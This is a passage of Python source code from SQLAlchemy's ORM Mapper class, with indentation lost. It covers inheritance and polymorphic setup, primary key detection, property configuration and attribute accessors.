and not self.concrete
and self.inherits.order_by is not False
):
self.order_by = self.inherits.order_by
self.polymorphic_map = self.inherits.polymorphic_map
self.batch = self.inherits.batch
self.inherits._inheriting_mappers.append(self)
self.base_mapper = self.inherits.base_mapper
self.passive_updates = self.inherits.passive_updates
self.passive_deletes = (
self.inherits.passive_deletes or self.passive_deletes
)
self._all_tables = self.inherits._all_tables
if self.polymorphic_identity is not None:
if self.polymorphic_identity in self.polymorphic_map:
util.warn(
"Reassigning polymorphic association for identity %r "
"from %r to %r: Check for duplicate use of %r as "
"value for polymorphic_identity."
% (
self.polymorphic_identity,
self.polymorphic_map[self.polymorphic_identity],
self,
self.polymorphic_identity,
)
)
self.polymorphic_map[self.polymorphic_identity] = self
if self.polymorphic_load and self.concrete:
raise sa_exc.ArgumentError(
"polymorphic_load is not currently supported "
"with concrete table inheritance"
)
if self.polymorphic_load == "inline":
self.inherits._add_with_polymorphic_subclass(self)
elif self.polymorphic_load == "selectin":
pass
elif self.polymorphic_load is not None:
raise sa_exc.ArgumentError(
"unknown argument for polymorphic_load: %r"
% self.polymorphic_load
)
else:
self._all_tables = set()
self.base_mapper = self
self.mapped_table = self.local_table
if self.polymorphic_identity is not None:
self.polymorphic_map[self.polymorphic_identity] = self
self._identity_class = self.class_
if self.mapped_table is None:
raise sa_exc.ArgumentError(
"Mapper '%s' does not have a mapped_table specified." % self
)
def _set_with_polymorphic(self, with_polymorphic):
if with_polymorphic == "*":
self.with_polymorphic = ("*", None)
elif isinstance(with_polymorphic, (tuple, list)):
if isinstance(
with_polymorphic[0], util.string_types + (tuple, list)
):
self.with_polymorphic = with_polymorphic
else:
self.with_polymorphic = (with_polymorphic, None)
elif with_polymorphic is not None:
raise sa_exc.ArgumentError("Invalid setting for with_polymorphic")
else:
self.with_polymorphic = None
if isinstance(self.local_table, expression.SelectBase):
raise sa_exc.InvalidRequestError(
"When mapping against a select() construct, map against "
"an alias() of the construct instead."
"This because several databases don't allow a "
"SELECT from a subquery that does not have an alias."
)
if self.with_polymorphic and isinstance(
self.with_polymorphic[1], expression.SelectBase
):
self.with_polymorphic = (
self.with_polymorphic[0],
self.with_polymorphic[1].alias(),
)
if self.configured:
self._expire_memoizations()
def _add_with_polymorphic_subclass(self, mapper):
subcl = mapper.class_
if self.with_polymorphic is None:
self._set_with_polymorphic((subcl,))
elif self.with_polymorphic[0] != "*":
self._set_with_polymorphic(
(self.with_polymorphic[0] + (subcl,), self.with_polymorphic[1])
)
def _set_concrete_base(self, mapper):
"""Set the given :class:`.Mapper` as the 'inherits' for this
:class:`.Mapper`, assuming this :class:`.Mapper` is concrete
and does not already have an inherits."""
assert self.concrete
assert not self.inherits
assert isinstance(mapper, Mapper)
self.inherits = mapper
self.inherits.polymorphic_map.update(self.polymorphic_map)
self.polymorphic_map = self.inherits.polymorphic_map
for mapper in self.iterate_to_root():
if mapper.polymorphic_on is not None:
mapper._requires_row_aliasing = True
self.batch = self.inherits.batch
for mp in self.self_and_descendants:
mp.base_mapper = self.inherits.base_mapper
self.inherits._inheriting_mappers.append(self)
self.passive_updates = self.inherits.passive_updates
self._all_tables = self.inherits._all_tables
for key, prop in mapper._props.items():
if key not in self._props and not self._should_exclude(
key, key, local=False, column=None
):
self._adapt_inherited_property(key, prop, False)
def _set_polymorphic_on(self, polymorphic_on):
self.polymorphic_on = polymorphic_on
self._configure_polymorphic_setter(True)
def _configure_legacy_instrument_class(self):
if self.inherits:
self.dispatch._update(self.inherits.dispatch)
super_extensions = set(
chain(
*[
m._deprecated_extensions
for m in self.inherits.iterate_to_root()
]
)
)
else:
super_extensions = set()
for ext in self._deprecated_extensions:
if ext not in super_extensions:
ext._adapt_instrument_class(self, ext)
def _configure_listeners(self):
if self.inherits:
super_extensions = set(
chain(
*[
m._deprecated_extensions
for m in self.inherits.iterate_to_root()
]
)
)
else:
super_extensions = set()
for ext in self._deprecated_extensions:
if ext not in super_extensions:
ext._adapt_listener(self, ext)
def _configure_class_instrumentation(self):
"""If this mapper is to be a primary mapper (i.e. the
non_primary flag is not set), associate this Mapper with the
given class_ and entity name.
Subsequent calls to ``class_mapper()`` for the class_/entity
name combination will return this mapper. Also decorate the
`__init__` method on the mapped class to include optional
auto-session attachment logic.
"""
manager = attributes.manager_of_class(self.class_)
if self.non_primary:
if not manager or not manager.is_mapped:
raise sa_exc.InvalidRequestError(
"Class %s has no primary mapper configured. Configure "
"a primary mapper first before setting up a non primary "
"Mapper." % self.class_
)
self.class_manager = manager
self._identity_class = manager.mapper._identity_class
_mapper_registry[self] = True
return
if manager is not None:
assert manager.class_ is self.class_
if manager.is_mapped:
raise sa_exc.ArgumentError(
"Class '%s' already has a primary mapper defined. "
"Use non_primary=True to "
"create a non primary Mapper. clear_mappers() will "
"remove *all* current mappers from all classes."
% self.class_
)
# else:
# a ClassManager may already exist as
# ClassManager.instrument_attribute() creates
# new managers for each subclass if they don't yet exist.
_mapper_registry[self] = True
# note: this *must be called before instrumentation.register_class*
# to maintain the documented behavior of instrument_class
self.dispatch.instrument_class(self, self.class_)
if manager is None:
manager = instrumentation.register_class(self.class_)
self.class_manager = manager
manager.mapper = self
manager.deferred_scalar_loader = util.partial(
loading.load_scalar_attributes, self
)
# The remaining members can be added by any mapper,
# e_name None or not.
if manager.info.get(_INSTRUMENTOR, False):
return
event.listen(manager, "first_init", _event_on_first_init, raw=True)
event.listen(manager, "init", _event_on_init, raw=True)
for key, method in util.iterate_attributes(self.class_):
if key == "__init__" and hasattr(method, "_sa_original_init"):
method = method._sa_original_init
if isinstance(method, types.MethodType):
method = method.im_func
if isinstance(method, types.FunctionType):
if hasattr(method, "__sa_reconstructor__"):
self._reconstructor = method
event.listen(manager, "load", _event_on_load, raw=True)
elif hasattr(method, "__sa_validators__"):
validation_opts = method.__sa_validation_opts__
for name in method.__sa_validators__:
if name in self.validators:
raise sa_exc.InvalidRequestError(
"A validation function for mapped "
"attribute %r on mapper %s already exists."
% (name, self)
)
self.validators = self.validators.union(
{name: (method, validation_opts)}
)
manager.info[_INSTRUMENTOR] = self
@classmethod
def _configure_all(cls):
"""Class-level path to the :func:`.configure_mappers` call.
"""
configure_mappers()
def dispose(self):
# Disable any attribute-based compilation.
self.configured = True
self._dispose_called = True
if hasattr(self, "_configure_failed"):
del self._configure_failed
if (
not self.non_primary
and self.class_manager is not None
and self.class_manager.is_mapped
and self.class_manager.mapper is self
):
instrumentation.unregister_class(self.class_)
def _configure_pks(self):
self.tables = sql_util.find_tables(self.mapped_table)
self._pks_by_table = {}
self._cols_by_table = {}
all_cols = util.column_set(
chain(*[col.proxy_set for col in self._columntoproperty])
)
pk_cols = util.column_set(c for c in all_cols if c.primary_key)
# identify primary key columns which are also mapped by this mapper.
tables = set(self.tables + [self.mapped_table])
self._all_tables.update(tables)
for t in tables:
if t.primary_key and pk_cols.issuperset(t.primary_key):
# ordering is important since it determines the ordering of
# mapper.primary_key (and therefore query.get())
self._pks_by_table[t] = util.ordered_column_set(
t.primary_key
).intersection(pk_cols)
self._cols_by_table[t] = util.ordered_column_set(t.c).intersection(
all_cols
)
# if explicit PK argument sent, add those columns to the
# primary key mappings
if self._primary_key_argument:
for k in self._primary_key_argument:
if k.table not in self._pks_by_table:
self._pks_by_table[k.table] = util.OrderedSet()
self._pks_by_table[k.table].add(k)
# otherwise, see that we got a full PK for the mapped table
elif (
self.mapped_table not in self._pks_by_table
or len(self._pks_by_table[self.mapped_table]) == 0
):
raise sa_exc.ArgumentError(
"Mapper %s could not assemble any primary "
"key columns for mapped table '%s'"
% (self, self.mapped_table.description)
)
elif self.local_table not in self._pks_by_table and isinstance(
self.local_table, schema.Table
):
util.warn(
"Could not assemble any primary "
"keys for locally mapped table '%s' - "
"no rows will be persisted in this Table."
% self.local_table.description
)
if (
self.inherits
and not self.concrete
and not self._primary_key_argument
):
# if inheriting, the "primary key" for this mapper is
# that of the inheriting (unless concrete or explicit)
self.primary_key = self.inherits.primary_key
else:
# determine primary key from argument or mapped_table pks -
# reduce to the minimal set of columns
if self._primary_key_argument:
primary_key = sql_util.reduce_columns(
[
self.mapped_table.corresponding_column(c)
for c in self._primary_key_argument
],
ignore_nonexistent_tables=True,
)
else:
primary_key = sql_util.reduce_columns(
self._pks_by_table[self.mapped_table],
ignore_nonexistent_tables=True,
)
if len(primary_key) == 0:
raise sa_exc.ArgumentError(
"Mapper %s could not assemble any primary "
"key columns for mapped table '%s'"
% (self, self.mapped_table.description)
)
self.primary_key = tuple(primary_key)
self._log("Identified primary key columns: %s", primary_key)
# determine cols that aren't expressed within our tables; mark these
# as "read only" properties which are refreshed upon INSERT/UPDATE
self._readonly_props = set(
self._columntoproperty[col]
for col in self._columntoproperty
if self._columntoproperty[col] not in self._identity_key_props
and (
not hasattr(col, "table")
or col.table not in self._cols_by_table
)
)
def _configure_properties(self):
# Column and other ClauseElement objects which are mapped
self.columns = self.c = util.OrderedProperties()
# object attribute names mapped to MapperProperty objects
self._props = util.OrderedDict()
# table columns mapped to lists of MapperProperty objects
# using a list allows a single column to be defined as
# populating multiple object attributes
self._columntoproperty = _ColumnMapping(self)
# load custom properties
if self._init_properties:
for key, prop in self._init_properties.items():
self._configure_property(key, prop, False)
# pull properties from the inherited mapper if any.
if self.inherits:
for key, prop in self.inherits._props.items():
if key not in self._props and not self._should_exclude(
key, key, local=False, column=None
):
self._adapt_inherited_property(key, prop, False)
# create properties for each column in the mapped table,
# for those columns which don't already map to a property
for column in self.mapped_table.columns:
if column in self._columntoproperty:
continue
column_key = (self.column_prefix or "") + column.key
if self._should_exclude(
column.key,
column_key,
local=self.local_table.c.contains_column(column),
column=column,
):
continue
# adjust the "key" used for this column to that
# of the inheriting mapper
for mapper in self.iterate_to_root():
if column in mapper._columntoproperty:
column_key = mapper._columntoproperty[column].key
self._configure_property(
column_key, column, init=False, setparent=True
)
def _configure_polymorphic_setter(self, init=False):
"""Configure an attribute on the mapper representing the
'polymorphic_on' column, if applicable, and not
already generated by _configure_properties (which is typical).
Also create a setter function which will assign this
attribute to the value of the 'polymorphic_identity'
upon instance construction, also if applicable. This
routine will run when an instance is created.
"""
setter = False
if self.polymorphic_on is not None:
setter = True
if isinstance(self.polymorphic_on, util.string_types):
# polymorphic_on specified as a string - link
# it to mapped ColumnProperty
try:
self.polymorphic_on = self._props[self.polymorphic_on]
except KeyError:
raise sa_exc.ArgumentError(
"Can't determine polymorphic_on "
"value '%s' - no attribute is "
"mapped to this name." % self.polymorphic_on
)
if self.polymorphic_on in self._columntoproperty:
# polymorphic_on is a column that is already mapped
# to a ColumnProperty
prop = self._columntoproperty[self.polymorphic_on]
elif isinstance(self.polymorphic_on, MapperProperty):
# polymorphic_on is directly a MapperProperty,
# ensure it's a ColumnProperty
if not isinstance(
self.polymorphic_on, properties.ColumnProperty
):
raise sa_exc.ArgumentError(
"Only direct column-mapped "
"property or SQL expression "
"can be passed for polymorphic_on"
)
prop = self.polymorphic_on
elif not expression._is_column(self.polymorphic_on):
# polymorphic_on is not a Column and not a ColumnProperty;
# not supported right now.
raise sa_exc.ArgumentError(
"Only direct column-mapped "
"property or SQL expression "
"can be passed for polymorphic_on"
)
else:
# polymorphic_on is a Column or SQL expression and
# doesn't appear to be mapped. this means it can be 1.
# only present in the with_polymorphic selectable or
# 2. a totally standalone SQL expression which we'd
# hope is compatible with this mapper's mapped_table
col = self.mapped_table.corresponding_column(
self.polymorphic_on
)
if col is None:
# polymorphic_on doesn't derive from any
# column/expression isn't present in the mapped
# table. we will make a "hidden" ColumnProperty
# for it. Just check that if it's directly a
# schema.Column and we have with_polymorphic, it's
# likely a user error if the schema.Column isn't
# represented somehow in either mapped_table or
# with_polymorphic. Otherwise as of 0.7.4 we
# just go with it and assume the user wants it
# that way (i.e. a CASE statement)
setter = False
instrument = False
col = self.polymorphic_on
if isinstance(col, schema.Column) and (
self.with_polymorphic is None
or self.with_polymorphic[1].corresponding_column(col)
is None
):
raise sa_exc.InvalidRequestError(
"Could not map polymorphic_on column "
"'%s' to the mapped table - polymorphic "
"loads will not function properly"
% col.description
)
else:
# column/expression that polymorphic_on derives from
# is present in our mapped table
# and is probably mapped, but polymorphic_on itself
# is not. This happens when
# the polymorphic_on is only directly present in the
# with_polymorphic selectable, as when use
# polymorphic_union.
# we'll make a separate ColumnProperty for it.
instrument = True
key = getattr(col, "key", None)
if key:
if self._should_exclude(col.key, col.key, False, col):
raise sa_exc.InvalidRequestError(
"Cannot exclude or override the "
"discriminator column %r" % col.key
)
else:
self.polymorphic_on = col = col.label("_sa_polymorphic_on")
key = col.key
prop = properties.ColumnProperty(col, _instrument=instrument)
self._configure_property(key, prop, init=init, setparent=True)
# the actual polymorphic_on should be the first public-facing
# column in the property
self.polymorphic_on = prop.columns[0]
polymorphic_key = prop.key
else:
# no polymorphic_on was set.
# check inheriting mappers for one.
for mapper in self.iterate_to_root():
# determine if polymorphic_on of the parent
# should be propagated here. If the col
# is present in our mapped table, or if our mapped
# table is the same as the parent (i.e. single table
# inheritance), we can use it
if mapper.polymorphic_on is not None:
if self.mapped_table is mapper.mapped_table:
self.polymorphic_on = mapper.polymorphic_on
else:
self.polymorphic_on = (
self.mapped_table.corresponding_column
)(mapper.polymorphic_on)
# we can use the parent mapper's _set_polymorphic_identity
# directly; it ensures the polymorphic_identity of the
# instance's mapper is used so is portable to subclasses.
if self.polymorphic_on is not None:
self._set_polymorphic_identity = (
mapper._set_polymorphic_identity
)
self._validate_polymorphic_identity = (
mapper._validate_polymorphic_identity
)
else:
self._set_polymorphic_identity = None
return
if setter:
def _set_polymorphic_identity(state):
dict_ = state.dict
state.get_impl(polymorphic_key).set(
state,
dict_,
state.manager.mapper.polymorphic_identity,
None,
)
def _validate_polymorphic_identity(mapper, state, dict_):
if (
polymorphic_key in dict_
and dict_[polymorphic_key]
not in mapper._acceptable_polymorphic_identities
):
util.warn_limited(
"Flushing object %s with "
"incompatible polymorphic identity %r; the "
"object may not refresh and/or load correctly",
(state_str(state), dict_[polymorphic_key]),
)
self._set_polymorphic_identity = _set_polymorphic_identity
self._validate_polymorphic_identity = (
_validate_polymorphic_identity
)
else:
self._set_polymorphic_identity = None
_validate_polymorphic_identity = None
@_memoized_configured_property
def _version_id_prop(self):
if self.version_id_col is not None:
return self._columntoproperty[self.version_id_col]
else:
return None
@_memoized_configured_property
def _acceptable_polymorphic_identities(self):
identities = set()
stack = deque([self])
while stack:
item = stack.popleft()
if item.mapped_table is self.mapped_table:
identities.add(item.polymorphic_identity)
stack.extend(item._inheriting_mappers)
return identities
@_memoized_configured_property
def _prop_set(self):
return frozenset(self._props.values())
def _adapt_inherited_property(self, key, prop, init):
if not self.concrete:
self._configure_property(key, prop, init=False, setparent=False)
elif key not in self._props:
# determine if the class implements this attribute; if not,
# or if it is implemented by the attribute that is handling the
# given superclass-mapped property, then we need to report that we
# can't use this at the instance level since we are a concrete
# mapper and we don't map this. don't trip user-defined
# descriptors that might have side effects when invoked.
implementing_attribute = self.class_manager._get_class_attr_mro(
key, prop
)
if implementing_attribute is prop or (
isinstance(
implementing_attribute, attributes.InstrumentedAttribute
)
and implementing_attribute._parententity is prop.parent
):
self._configure_property(
key,
properties.ConcreteInheritedProperty(),
init=init,
setparent=True,
)
def _configure_property(self, key, prop, init=True, setparent=True):
self._log("_configure_property(%s, %s)", key, prop.__class__.__name__)
if not isinstance(prop, MapperProperty):
prop = self._property_from_column(key, prop)
if isinstance(prop, properties.ColumnProperty):
col = self.mapped_table.corresponding_column(prop.columns[0])
# if the column is not present in the mapped table,
# test if a column has been added after the fact to the
# parent table (or their parent, etc.) [ticket:1570]
if col is None and self.inherits:
path = [self]
for m in self.inherits.iterate_to_root():
col = m.local_table.corresponding_column(prop.columns[0])
if col is not None:
for m2 in path:
m2.mapped_table._reset_exported()
col = self.mapped_table.corresponding_column(
prop.columns[0]
)
break
path.append(m)
# subquery expression, column not present in the mapped
# selectable.
if col is None:
col = prop.columns[0]
# column is coming in after _readonly_props was
# initialized; check for 'readonly'
if hasattr(self, "_readonly_props") and (
not hasattr(col, "table")
or col.table not in self._cols_by_table
):
self._readonly_props.add(prop)
else:
# if column is coming in after _cols_by_table was
# initialized, ensure the col is in the right set
if (
hasattr(self, "_cols_by_table")
and col.table in self._cols_by_table
and col not in self._cols_by_table[col.table]
):
self._cols_by_table[col.table].add(col)
# if this properties.ColumnProperty represents the "polymorphic
# discriminator" column, mark it. We'll need this when rendering
# columns in SELECT statements.
if not hasattr(prop, "_is_polymorphic_discriminator"):
prop._is_polymorphic_discriminator = (
col is self.polymorphic_on
or prop.columns[0] is self.polymorphic_on
)
self.columns[key] = col
for col in prop.columns + prop._orig_columns:
for col in col.proxy_set:
self._columntoproperty[col] = prop
prop.key = key
if setparent:
prop.set_parent(self, init)
if key in self._props and getattr(
self._props[key], "_mapped_by_synonym", False
):
syn = self._props[key]._mapped_by_synonym
raise sa_exc.ArgumentError(
"Can't call map_column=True for synonym %r=%r, "
"a ColumnProperty already exists keyed to the name "
"%r for column %r" % (syn, key, key, syn)
)
if (
key in self._props
and not isinstance(prop, properties.ColumnProperty)
and not isinstance(
self._props[key],
(
properties.ColumnProperty,
properties.ConcreteInheritedProperty,
),
)
):
util.warn(
"Property %s on %s being replaced with new "
"property %s; the old property will be discarded"
% (self._props[key], self, prop)
)
oldprop = self._props[key]
self._path_registry.pop(oldprop, None)
self._props[key] = prop
if not self.non_primary:
prop.instrument_class(self)
for mapper in self._inheriting_mappers:
mapper._adapt_inherited_property(key, prop, init)
if init:
prop.init()
prop.post_instrument_class(self)
if self.configured:
self._expire_memoizations()
def _property_from_column(self, key, prop):
"""generate/update a :class:`.ColumnProprerty` given a
:class:`.Column` object. """
# we were passed a Column or a list of Columns;
# generate a properties.ColumnProperty
columns = util.to_list(prop)
column = columns[0]
if not expression._is_column(column):
raise sa_exc.ArgumentError(
"%s=%r is not an instance of MapperProperty or Column"
% (key, prop)
)
prop = self._props.get(key, None)
if isinstance(prop, properties.ColumnProperty):
if (
(
not self._inherits_equated_pairs
or (prop.columns[0], column)
not in self._inherits_equated_pairs
)
and not prop.columns[0].shares_lineage(column)
and prop.columns[0] is not self.version_id_col
and column is not self.version_id_col
):
warn_only = prop.parent is not self
msg = (
"Implicitly combining column %s with column "
"%s under attribute '%s'. Please configure one "
"or more attributes for these same-named columns "
"explicitly." % (prop.columns[-1], column, key)
)
if warn_only:
util.warn(msg)
else:
raise sa_exc.InvalidRequestError(msg)
# existing properties.ColumnProperty from an inheriting
# mapper. make a copy and append our column to it
prop = prop.copy()
prop.columns.insert(0, column)
self._log(
"inserting column to existing list "
"in properties.ColumnProperty %s" % (key)
)
return prop
elif prop is None or isinstance(
prop, properties.ConcreteInheritedProperty
):
mapped_column = []
for c in columns:
mc = self.mapped_table.corresponding_column(c)
if mc is None:
mc = self.local_table.corresponding_column(c)
if mc is not None:
# if the column is in the local table but not the
# mapped table, this corresponds to adding a
# column after the fact to the local table.
# [ticket:1523]
self.mapped_table._reset_exported()
mc = self.mapped_table.corresponding_column(c)
if mc is None:
raise sa_exc.ArgumentError(
"When configuring property '%s' on %s, "
"column '%s' is not represented in the mapper's "
"table. Use the `column_property()` function to "
"force this column to be mapped as a read-only "
"attribute." % (key, self, c)
)
mapped_column.append(mc)
return properties.ColumnProperty(*mapped_column)
else:
raise sa_exc.ArgumentError(
"WARNING: when configuring property '%s' on %s, "
"column '%s' conflicts with property '%r'. "
"To resolve this, map the column to the class under a "
"different name in the 'properties' dictionary. Or, "
"to remove all awareness of the column entirely "
"(including its availability as a foreign key), "
"use the 'include_properties' or 'exclude_properties' "
"mapper arguments to control specifically which table "
"columns get mapped." % (key, self, column.key, prop)
)
def _post_configure_properties(self):
"""Call the ``init()`` method on all ``MapperProperties``
attached to this mapper.
This is a deferred configuration step which is intended
to execute once all mappers have been constructed.
"""
self._log("_post_configure_properties() started")
l = [(key, prop) for key, prop in self._props.items()]
for key, prop in l:
self._log("initialize prop %s", key)
if prop.parent is self and not prop._configure_started:
prop.init()
if prop._configure_finished:
prop.post_instrument_class(self)
self._log("_post_configure_properties() complete")
self.configured = True
def add_properties(self, dict_of_properties):
"""Add the given dictionary of properties to this mapper,
using `add_property`.
"""
for key, value in dict_of_properties.items():
self.add_property(key, value)
def add_property(self, key, prop):
"""Add an individual MapperProperty to this mapper.
If the mapper has not been configured yet, just adds the
property to the initial properties dictionary sent to the
constructor. If this Mapper has already been configured, then
the given MapperProperty is configured immediately.
"""
self._init_properties[key] = prop
self._configure_property(key, prop, init=self.configured)
def _expire_memoizations(self):
for mapper in self.iterate_to_root():
_memoized_configured_property.expire_instance(mapper)
@property
def _log_desc(self):
return (
"("
+ self.class_.__name__
+ "|"
+ (
self.local_table is not None
and self.local_table.description
or str(self.local_table)
)
+ (self.non_primary and "|non-primary" or "")
+ ")"
)
def _log(self, msg, *args):
self.logger.info("%s " + msg, *((self._log_desc,) + args))
def _log_debug(self, msg, *args):
self.logger.debug("%s " + msg, *((self._log_desc,) + args))
def __repr__(self):
return "<Mapper at 0x%x; %s>" % (id(self), self.class_.__name__)
def __str__(self):
return "Mapper|%s|%s%s" % (
self.class_.__name__,
self.local_table is not None
and self.local_table.description
or None,
self.non_primary and "|non-primary" or "",
)
def _is_orphan(self, state):
orphan_possible = False
for mapper in self.iterate_to_root():
for (key, cls) in mapper._delete_orphans:
orphan_possible = True
has_parent = attributes.manager_of_class(cls).has_parent(
state, key, optimistic=state.has_identity
)
if self.legacy_is_orphan and has_parent:
return False
elif not self.legacy_is_orphan and not has_parent:
return True
if self.legacy_is_orphan:
return orphan_possible
else:
return False
def has_property(self, key):
return key in self._props
def get_property(self, key, _configure_mappers=True):
"""return a MapperProperty associated with the given key.
"""
if _configure_mappers and Mapper._new_mappers:
configure_mappers()
try:
return self._props[key]
except KeyError:
raise sa_exc.InvalidRequestError(
"Mapper '%s' has no property '%s'" % (self, key)
)
def get_property_by_column(self, column):
"""Given a :class:`.Column` object, return the
:class:`.MapperProperty` which maps this column."""
return self._columntoproperty[column]
@property
def iterate_properties(self):
"""return an iterator of all MapperProperty objects."""
if Mapper._new_mappers:
configure_mappers()
return iter(self._props.values())
def _mappers_from_spec(self, spec, selectable):
"""given a with_polymorphic() argument, return the set of mappers it
represents.
Trims the list of mappers to just those represented within the given
selectable, if present. This helps some more legacy-ish mappings.
"""
if spec == "*":
mappers = list(self.self_and_descendants)
elif spec:
mappers = set()
for m in util.to_list(spec):
m = _class_to_mapper(m)
if not m.isa(self):
raise sa_exc.InvalidRequestError(
"%r does not inherit from %r" % (m, self)
)
if selectable is None:
mappers.update(m.iterate_to_root())
else:
mappers.add(m)
mappers = [m for m in self.self_and_descendants if m in mappers]
else:
mappers = []
if selectable is not None:
tables = set(
sql_util.find_tables(selectable, include_aliases=True)
)
mappers = [m for m in mappers if m.local_table in tables]
return mappers
def _selectable_from_mappers(self, mappers, innerjoin):
"""given a list of mappers (assumed to be within this mapper's
inheritance hierarchy), construct an outerjoin amongst those mapper's
mapped tables.
"""
from_obj = self.mapped_table
for m in mappers:
if m is self:
continue
if m.concrete:
raise sa_exc.InvalidRequestError(
"'with_polymorphic()' requires 'selectable' argument "
"when concrete-inheriting mappers are used."
)
elif not m.single:
if innerjoin:
from_obj = from_obj.join(
m.local_table, m.inherit_condition
)
else:
from_obj = from_obj.outerjoin(
m.local_table, m.inherit_condition
)
return from_obj
@_memoized_configured_property
def _single_table_criterion(self):
if self.single and self.inherits and self.polymorphic_on is not None:
return self.polymorphic_on.in_(
m.polymorphic_identity for m in self.self_and_descendants
)
else:
return None
@_memoized_configured_property
def _with_polymorphic_mappers(self):
if Mapper._new_mappers:
configure_mappers()
if not self.with_polymorphic:
return []
return self._mappers_from_spec(*self.with_polymorphic)
@_memoized_configured_property
def _with_polymorphic_selectable(self):
if not self.with_polymorphic:
return self.mapped_table
spec, selectable = self.with_polymorphic
if selectable is not None:
return selectable
else:
return self._selectable_from_mappers(
self._mappers_from_spec(spec, selectable), False
)
with_polymorphic_mappers = _with_polymorphic_mappers
"""The list of :class:`.Mapper` objects included in the
default "polymorphic" query.
"""
@_memoized_configured_property
def _insert_cols_evaluating_none(self):
return dict(
(
table,
frozenset(
col for col in columns if col.type.should_evaluate_none
),
)
for table, columns in self._cols_by_table.items()
)
@_memoized_configured_property
def _insert_cols_as_none(self):
return dict(
(
table,
frozenset(
col.key
for col in columns
if not col.primary_key
and not col.server_default
and not col.default
and not col.type.should_evaluate_none
),
)
for table, columns in self._cols_by_table.items()
)
@_memoized_configured_property
def _propkey_to_col(self):
return dict(
(
table,
dict(
(self._columntoproperty[col].key, col) for col in columns
),
)
for table, columns in self._cols_by_table.items()
)
@_memoized_configured_property
def _pk_keys_by_table(self):
return dict(
(table, frozenset([col.key for col in pks]))
for table, pks in self._pks_by_table.items()
)
@_memoized_configured_property
def _pk_attr_keys_by_table(self):
return dict(
(
table,
frozenset([self._columntoproperty[col].key for col in pks]),
)
for table, pks in self._pks_by_table.items()
)
@_memoized_configured_property
def _server_default_cols(self):
return dict(
(
table,
frozenset(
[
col.key
for col in columns
if col.server_default is not None
]
),
)
for table, columns in self._cols_by_table.items()
)
@_memoized_configured_property
def _server_default_plus_onupdate_propkeys(self):
result = set()
for table, columns in self._cols_by_table.items():
for col in columns:
if (
col.server_default is not None
or col.server_onupdate is not None
) and col in self._columntoproperty:
result.add(self._columntoproperty[col].key)
return result
@_memoized_configured_property
def _server_onupdate_default_cols(self):
return dict(
(
table,
frozenset(
[
col.key
for col in columns
if col.server_onupdate is not None
]
),
)
for table, columns in self._cols_by_table.items()
)
@property
def selectable(self):
"""The :func:`.select` construct this :class:`.Mapper` selects from
by default.
Normally, this is equivalent to :attr:`.mapped_table`, unless
the ``with_polymorphic`` feature is in use, in which case the
full "polymorphic" selectable is returned.
"""
return self._with_polymorphic_selectable
def _with_polymorphic_args(
self, spec=None, selectable=False, innerjoin=False
):
if self.with_polymorphic:
if not spec:
spec = self.with_polymorphic[0]
if selectable is False:
selectable = self.with_polymorphic[1]
elif selectable is False:
selectable = None
mappers = self._mappers_from_spec(spec, selectable)
if selectable is not None:
return mappers, selectable
else:
return mappers, self._selectable_from_mappers(mappers, innerjoin)
@_memoized_configured_property
def _polymorphic_properties(self):
return list(
self._iterate_polymorphic_properties(
self._with_polymorphic_mappers
)
)
def _iterate_polymorphic_properties(self, mappers=None):
"""Return an iterator of MapperProperty objects which will render into
a SELECT."""
if mappers is None:
mappers = self._with_polymorphic_mappers
if not mappers:
for c in self.iterate_properties:
yield c
else:
# in the polymorphic case, filter out discriminator columns
# from other mappers, as these are sometimes dependent on that
# mapper's polymorphic selectable (which we don't want rendered)
for c in util.unique_list(
chain(
*[
list(mapper.iterate_properties)
for mapper in [self] + mappers
]
)
):
if getattr(c, "_is_polymorphic_discriminator", False) and (
self.polymorphic_on is None
or c.columns[0] is not self.polymorphic_on
):
continue
yield c
@_memoized_configured_property
def attrs(self):
"""A namespace of all :class:`.MapperProperty` objects
associated this mapper.
This is an object that provides each property based on
its key name. For instance, the mapper for a
``User`` class which has ``User.name`` attribute would
provide ``mapper.attrs.name``, which would be the
:class:`.ColumnProperty` representing the ``name``
column. The namespace object can also be iterated,
which would yield each :class:`.MapperProperty`.
:class:`.Mapper` has several pre-filtered views
of this attribute which limit the types of properties
returned, inclding :attr:`.synonyms`, :attr:`.column_attrs`,
:attr:`.relationships`, and :attr:`.composites`.
.. warning::
The :attr:`.Mapper.attrs` accessor namespace is an
instance of :class:`.OrderedProperties`. This is
a dictionary-like object which includes a small number of
named methods such as :meth:`.OrderedProperties.items`
and :meth:`.OrderedProperties.values`. When
accessing attributes dynamically, favor using the dict-access
scheme, e.g. ``mapper.attrs[somename]`` over
``getattr(mapper.attrs, somename)`` to avoid name collisions.
.. seealso::
:attr:`.Mapper.all_orm_descriptors`
"""
if Mapper._new_mappers:
configure_mappers()
return util.ImmutableProperties(self._props)
@_memoized_configured_property
def all_orm_descriptors(self):
"""A namespace of all :class:`.InspectionAttr` attributes associated
with the mapped class.
These attributes are in all cases Python :term:`descriptors`
associated with the mapped class or its superclasses.
This namespace includes attributes that are mapped to the class
as well as attributes declared by extension modules.
It includes any Python descriptor type that inherits from
:class:`.InspectionAttr`. This includes
:class:`.QueryableAttribute`, as well as extension types such as
:class:`.hybrid_property`, :class:`.hybrid_method` and
:class:`.AssociationProxy`.
To distinguish between mapped attributes and extension attributes,
the attribute :attr:`.InspectionAttr.extension_type` will refer
to a constant that distinguishes between different extension types.
When dealing with a :class:`.QueryableAttribute`, the
:attr:`.QueryableAttribute.property` attribute refers to the
:class:`.MapperProperty` property, which is what you get when
referring to the collection of mapped properties via
:attr:`.Mapper.attrs`.
.. warning::
The :attr:`.Mapper.all_orm_descriptors` accessor namespace is an
instance of :class:`.OrderedProperties`. This is
a dictionary-like object which includes a small number of
named methods such as :meth:`.OrderedProperties.items`
and :meth:`.OrderedProperties.values`. When
accessing attributes dynamically, favor using the dict-access
scheme, e.g. ``mapper.all_orm_descriptors[somename]`` over
``getattr(mapper.all_orm_descriptors, somename)`` to avoid name
collisions.
.. versionadded:: 0.8.0
.. seealso::
:attr:`.Mapper.attrs`
"""
return util.ImmutableProperties(
dict(self.class_manager._all_sqla_attributes())
)
@_memoized_configured_property
def synonyms(self):
"""Return a namespace of all :class:`.SynonymProperty`
properties maintained by this :class:`.Mapper`.
.. seealso::
:attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
objects.
"""
return self._filter_properties(properties.SynonymProperty)
@_memoized_configured_property
def column_attrs(self):
"""Return a namespace of all :class:`.ColumnProperty`
properties maintained by this :class:`.Mapper`.
.. seealso::
:attr:`.Mapper.attrs` - namespace of all :class:`.MapperProperty`
objects.
"""
